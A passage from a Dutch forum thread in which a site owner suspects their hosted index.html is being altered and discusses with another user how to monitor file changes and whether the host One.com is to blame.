al dan niet gehackt is: het lijkt me voor u veel eenvoudiger om te ontdekken wanneer er een wijziging heeft plaatsgevonden in dit bestand, dat u uw logbestand een melding laat geven indien index.html gewijzigd is. Indien dit niet mogelijk is dan zal ik, hoe lastig ook, dagelijks de index controleren. Laat mij a.u.b. even weten welke koers te volgen. Voor de goede orde: ik heb niet het gevoel dat ik gehackt word maar veeleerder de online bestanden.
Mocht het probleem zich opnieuw voordoen (wat ik zeker verwacht) dan hoop ik dat we de oorzaak kunnen opsporen.

Vriendelijke groet,

Dusss ... wachten we het af.

[miekiemoes]

0ddow, installeer eens Filezilla in plaats. Zo kan je ook zien wanneer bepaalde bestanden gewijzigd werden aangezien de datum/tijd in de preview worden weergegeven.
Ik ben er bijna zeker van dat het bij One.com ligt.....

[0dd0w]

miekiemoes schreef:0ddow, installeer eens Filezilla in plaats. Zo kan je ook zien wanneer bepaalde bestanden gewijzigd werden aangezien de datum/tijd in de preview worden weergegeven.

Ik heb Filezilla inmiddels geïnstalleerd maar zie het voordeel nog niet: ook in CoreFTP kan ik zien wanneer de (online) bestanden gewijzigd zijn. Wat zou het handig zijn als een dergelijk programma een melding mailde als er een bestand gewijzigd/overschreven wordt...

miekiemoes schreef:Ik ben er bijna zeker van dat het bij One.com ligt.....

Ik ook, maar ik ben er nog steeds niet helemaal zeker van en ik verhuis m'n domeinen liever niet want heb verder goede ervaringen met one.com